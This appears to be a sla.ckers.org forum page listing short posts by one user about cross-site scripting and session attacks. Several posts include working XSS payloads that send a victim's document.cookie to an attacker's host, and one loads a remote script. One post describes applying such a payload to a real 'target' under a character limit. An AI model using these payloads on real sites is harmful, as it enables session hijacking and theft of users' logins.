Sla.ckers.org
Q and A on cross-site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For session fixations, hijacking, lockout, replay, session riding, etc.

Current Page: 1 of 1
Results 1 - 6 of 6
5 years ago
J4zen
Personally I always mess around with Cookie Editor (FF plugin) and log what cookies are being read by LiveHTTPheader (also FF plugin). Then continue from there :)
Forum: CSRF and Session Info
5 years ago
J4zen
Ah, now I see, it seems like I misunderstood you. You meant including a JS that would use the picture as a method of posting. Didn't think of that, I merely referred and then had PHP refer it back once more. Smart :)
Forum: SQL and Code Injection
5 years ago
J4zen
Nice Reiners, I wasn't aware you could pass variables to index without actually specifying the file name. Heh, fun. <script>document.write('<img src=http://my_host/1.php?a='+document.cookie+'>')</script> I suppose that's the approach you mentioned, Ronald? Interesting stuff :)
Forum: SQL and Code Injection
5 years ago
J4zen
Yeah, I tried that, but I needed to pass a parameter to a script on the remote location. So those wouldn't do (as far as I know?). Thanks though :)
Forum: SQL and Code Injection
5 years ago
J4zen
I tried that before, unfortunately it didn't work. Thanks though, any other ideas? Update: After messing around with it a bit more, I found that this did work: <SCRIPT SRC=//#####.com/#####/xss> Thanks .mario
Forum: SQL and Code Injection
5 years ago
J4zen
First post on sla.ckers, been reading the blog for roughly a year now and loving it. Anyway, I found an XSS hole on my target, but in order to apply it properly I need to stay below a 70 char limit. <script>window.location="www.######.nl/1/1.php?a="+document.cookie</script> In other words, the code above needs to go down an additional 6 bytes. I certainly lack the
Forum: SQL and Code Injection